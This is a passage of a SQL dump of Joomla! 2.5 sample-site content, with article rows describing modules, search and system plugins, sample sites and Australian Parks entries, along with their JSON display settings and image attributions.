links.</p>\r\n<p>If you are happy with how your site looks, it is fine to leave all of the options set to the defaults that were created when your site was installed. As you become more experienced with Joomla you will use options more.</p>\r\n<p> </p>','',1,19,'2011-01-01 00:00:01',676,'Joomla!','2012-01-17 16:21:24',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,10,'','',1,2773,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(33,131,'Phyllopteryx','phyllopteryx','<p> </p>\r\n','\r\n<p> </p>',1,72,'2011-01-01 00:00:01',676,'Parks Webmaster','2012-01-17 04:57:58',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"images\\/sampledata\\/parks\\/animals\\/200px_phyllopteryx_taeniolatus1.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"Phyllopteryx\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/sampledata\\/parks\\/animals\\/800px_phyllopteryx_taeniolatus1.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"Phyllopteryx\",\"image_fulltext_caption\":\"Source: http:\\/\\/en.wikipedia.org\\/wiki\\/File:Phyllopteryx_taeniolatus1.jpg Author: Richard Ling License: GNU Free Documentation License v 1.2 or later\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,3,'','',1,899,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(34,132,'Pinnacles','pinnacles','<p> </p>\r\n','\r\n<p> </p>',0,73,'2011-01-01 00:00:01',676,'Parks Webmaster','2012-01-17 04:41:30',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"images\\/sampledata\\/parks\\/landscape\\/120px_pinnacles_western_australia.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"Kings Canyon\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/sampledata\\/parks\\/landscape\\/800px_pinnacles_western_australia.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"Kings Canyon\",\"image_fulltext_caption\":\"Source: http:\\/\\/commons.wikimedia.org\\/wiki\\/File:Pinnacles_Western_Australia.jpg  Author: Martin Gloss  License: GNU Free Documentation license v 1.2 or later.\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,4,'','',1,593,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(35,133,'Professionals','professionals','<p>Joomla! 2.5 continues development of the Joomla Framework and CMS as a powerful and flexible way to bring your vision of the web to reality. With the administrator now fully MVC, the ability to control its look and the management of extensions is now complete.</p>\r\n','\r\n<p>Working with multiple template styles and overrides for the same views, creating the design you want is easier than it has ever been. Limiting support to PHP 5.2.4 and above makes Joomla lighter and faster than ever. Languages files can now be overridden without having your changes lost during an upgrade.  With the proper xml your users update extensions with a single click.</p>\r\n<p>Access control lists are now incorporated using a new system developed for Joomla. The ACL system is designed with developers in mind, so it is easy to incorporate into your extensions. The new nested sets libraries allow you to incorporate infinitely deep categories but also to use nested sets in a variety of other ways.</p>\r\n<p>A new forms library makes creating all kinds of user interaction simple. MooTools 1.3 provides a highly flexible javascript framework that is a major advance over MooTools 1.0.</p>\r\n<p>New events throughout the core make integration of your plugins where you want them a snap.</p>\r\n<p>The separation of the Joomla! Platform project from the Joomla! CMS project makes continuous development of new, powerful APIs  and continuous improvement of existing APIs possible while maintaining the stability of the CMS that millions of webmasters and professionals rely upon.</p>\r\n<p>Learn about:</p>\r\n<ul>\r\n<li><a href=\"http://docs.joomla.org/What\'s_new_in_Joomla_1.6\">Changes since 1.5</a></li>\r\n<li><a href=\"http://docs.joomla.org/ACL_Tutorial_for_Joomla_1.6\">Working with ACL</a></li>\r\n<li><a href=\"http://docs.joomla.org/API16:JCategories\">Working with nested categories</a></li>\r\n<li><a href=\"http://docs.joomla.org/API16:JForm\">Forms library</a></li>\r\n<li><a href=\"http://docs.joomla.org/Working_with_Mootools_1.3\">Working with Mootools 1.3</a></li>\r\n<li><a href=\"http://docs.joomla.org/Layout_Overrides_in_Joomla_1.6\">Using new features of the override system</a></li>\r\n<li><a href=\"http://api.joomla.org\">Joomla! API</a></li>\r\n<li><a href=\"http://docs.joomla.org/API16:JDatabaseQuery\">Using JDatabaseQuery</a></li>\r\n<li><a href=\"http://docs.joomla.org/What\'s_new_in_Joomla_1.6#Events\">New and updated events</a></li>\r\n<li><a href=\"http://docs.joomla.org/Xml-rpc_changes_in_Joomla!_1.6\">Xmlrpc</a></li>\r\n<li><a href=\"http://docs.joomla.org/What\'s_new_in_Joomla_1.6#Extension_management\">Installing and updating extensions</a></li>\r\n<li><a href=\"http://docs.joomla.org/Setting_up_your_workstation_for_Joomla!_development\">Setting up your development environment</a></li>\r\n<li><a href=\"github.com/joomla\">The Joomla! Platform Repository</a> </li>\r\n</ul>',1,19,'2011-01-01 00:00:01',676,'Joomla!','2011-12-27 11:36:13',42,0,'0000-00-00 00:00:00','2011-01-09 16:41:13','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',16,5,'','',1,2040,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(36,134,'Random Image Module','random-image-module','<p>This module displays a random image from your chosen image directory. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Module_Manager_Random_Image\" title=\"Random Image Module\">Help</a></p>\r\n<div class=\"sample-module\">{loadmodule random_image,Random Image}</div>','',1,66,'2011-01-01 00:00:01',676,'','2012-01-17 16:11:13',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,4,'','',1,2162,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(37,135,'Related Items Module','related-items-module','<p>This module displays other Articles that are related to the one currently being viewed. These relations are established by the Meta Keywords.  All the keywords of the current Article are searched against all the keywords of all other published articles. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Module_Manager_Articles_Related\" title=\"Related Items Module\">Help</a></p>\r\n<div class=\"sample-module\">{loadmodule related_items,Articles Related Items}</div>','',1,64,'2011-01-01 00:00:01',676,'Joomla!','2011-12-27 11:37:34',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,4,'modules, content','',1,2241,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(38,136,'Sample Sites','sample-sites','<p>Your installation includes sample data, designed to show you some of the options you have for building your website. In addition to information about Joomla! there are two sample \"sites within a site\" designed to help you get started with building your own site.</p>\r\n<p>The first site is a simple site about <a href=\"index.php?Itemid=243\">Australian Parks</a>. It shows how you can quickly and easily build a personal site with just the building blocks that are part of Joomla. It includes a personal blog, weblinks, and a very simple image gallery.</p>\r\n<p>The second site is slightly more complex and represents what you might do if you are building a site for a small business, in this case a <a href=\"index.php/welcome.html\"></a><a href=\"index.php?Itemid=429\">Fruit Shop</a>.</p>\r\n<p>In building either style site, or something completely different, you will probably want to add <a href=\"http://extensions.joomla.org\">extensions</a> and either create or purchase your own template. Many Joomla users start by modifying the <a href=\"http://docs.joomla.org/How_do_you_modify_a_template%3F\">templates</a> that come with the core distribution so that they include special images and other design elements that relate to their site\'s focus.</p>','',1,19,'2011-01-01 00:00:01',676,'Joomla!','2011-12-27 11:39:07',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,11,'','',1,1696,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(39,137,'Search','search-component','<p>Joomla! 2.5 offers two search options.</p>\r\n<p>The Basic Search component provides basic search functionality for the information contained in your core components. Many extensions can also be searched by the search component. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Components_Search\">Help</a></p>\r\n<p>The Smart Search component offers searching similar to that found in major search engines. Smart Search is disabled by default. If you choose to enable it you will need to take several steps. First, enable the Smart Search Plugin in the plugin manager. Then, if you are using the Basic Search Module replace it with the Smart Search Module. Finally, if you have already created content, go to the Smart Search component in your site administrator and click the Index icon. Once indexing of your content is complete, Smart Search will be ready to use. Help.</p>','',1,21,'2011-01-01 00:00:01',676,'Joomla!','2011-12-27 11:41:48',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,3,'','',1,1329,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(40,138,'Search Module','search-module','<p>This module will display a search box. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;keyref=Help16:Extensions_Module_Manager_Search\" title=\"Search\">Help</a></p>\r\n<div class=\"sample-module\">{loadmodule search,Search}</div>','',1,67,'2011-01-01 00:00:01',676,'Joomla!','2011-09-17 22:35:56',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',4,4,'','',1,3381,'',0,'*','',''),(41,139,'Search ','search-plugin','<p>The search component uses plugins to control which parts of your Joomla! site are searched. You may choose to turn off some areas to improve performance or for other reasons. Many third party Joomla! extensions have search plugins that extend where search takes place.</p>\r\n<p>Default On:</p>\r\n<ul>\r\n<li>Content <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Search_-_Content\">Help</a></li>\r\n<li>Contacts <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Search_-_Contacts\">Help</a></li>\r\n<li>Weblinks <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Search_-_Weblinks\">Help</a></li>\r\n<li>News Feeds <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Search_-_Newsfeeds\">Help</a></li>\r\n<li>Categories <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#Search_-_Categories\">Help</a></li>\r\n</ul>','',1,25,'2011-01-01 00:00:01',676,'Joomla!','2011-09-06 06:13:18',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',3,1,'','',1,1302,'',0,'*','',''),(42,140,'Site Map','site-map','<p>{loadposition sitemapload}</p><p><em>By putting all of your content into nested categories you can give users and search engines access to everything using a menu.</em></p>','',1,14,'2011-01-01 00:00:01',676,'Joomla!','2011-01-01 00:00:01',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',1,4,'','',1,451,'',0,'*','',''),(43,141,'Spotted Quoll','spotted-quoll','<p> </p>\r\n<p> </p>\r\n','\r\n<p> </p>',1,72,'2011-01-01 00:00:01',676,'Parks Webmaster','2012-01-17 05:02:58',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"images\\/sampledata\\/parks\\/animals\\/220px_spottedquoll_2005_seanmcclean.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"Spotted Quoll\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/sampledata\\/parks\\/animals\\/789px_spottedquoll_2005_seanmcclean.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"Spotted Quoll\",\"image_fulltext_caption\":\"Source: http:\\/\\/en.wikipedia.org\\/wiki\\/File:SpottedQuoll_2005_SeanMcClean.jpg Author: Sean McClean License: GNU Free Documentation License v 1.2 or later\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,4,'','',1,832,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(44,142,'Statistics Module','statistics','<p>This module shows information about your server installation together with statistics on the Web site users, number of Articles in your database and the number of Web links you provide.</p>\r\n<div class=\"sample-module\">{loadmodule mod_stats,Statistics}</div>','',1,67,'2011-01-01 00:00:01',676,'Joomla!','2011-12-27 11:43:25',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,5,'','',1,2082,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(45,143,'Syndicate Module','syndicate-module','<p>The syndicate module will display a link that allows users to take a feed from your site. It will only display on pages for which feeds are possible. That means it will not display on single article, contact or weblinks pages, such as this one. <a href=\"http://docs.joomla.org/Help15:Screen.modulessite.edit.15#Syndicate\" title=\"Synicate Module\">Help</a></p>\r\n<div class=\"sample-module\">{loadposition syndicate,Syndicate}</div>','',0,67,'2011-01-01 00:00:01',676,'','2011-12-27 11:44:16',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,6,'','',1,2198,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(46,144,'System','system','<p>System plugins operate every time a page on your site loads. They control such things as your URLS, whether users can check a \"remember me\" box on the login module, and whether caching is enabled. New is the redirect plugin that together with the redirect component will assist you in managing changes in URLs.</p>\r\n<p>Default on:</p>\r\n<ul>\r\n<li>Remember me <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#System_-_Remember_Me\">Help</a></li>\r\n<li>SEF <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#System_-_SEF\">Help</a></li>\r\n<li>Debug <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#System_-_Debug\">Help</a></li>\r\n</ul>\r\n<p>Default off:</p>\r\n<ul>\r\n<li>Cache <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#System_-_Cache\">Help</a></li>\r\n<li>Log <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#System_-_Log\">Help</a></li>\r\n<li>Redirect <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&amp;amp;keyref=Help17:Extensions_Plugin_Manager_Edit#System_-_Redirect\">Help</a></li>\r\n</ul>','',1,25,'2011-01-01 00:00:01',676,'Joomla!','2011-12-27 11:45:54',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,2,'','',1,3081,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(47,145,'The Joomla! Community','the-joomla-community','<p>Joomla means All Together, and it is a community of people all working and having fun together that makes Joomla possible. Thousands of people each year participate in the Joomla community, and we hope you will be one of them.</p>\r\n<p>People with all kinds of skills, of all skill levels and from around the world are welcome to join in. Participate in the <a href=\"http://joomla.org\">Joomla.org</a> family of websites (the<a href=\"http://forum.joomla.org\"> forum </a>is a great place to start). Come to a <a href=\"http://community.joomla.org/events.html\">Joomla! event</a>. Join or start a <a href=\"http://community.joomla.org/user-groups.html\">Joomla! Users Group</a>. Whether you are a developer, site administrator, designer, end user or fan, there are ways for you to participate and contribute.</p>','',1,19,'2011-01-01 00:00:01',676,'Joomla!','2011-12-27 11:47:56',42,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 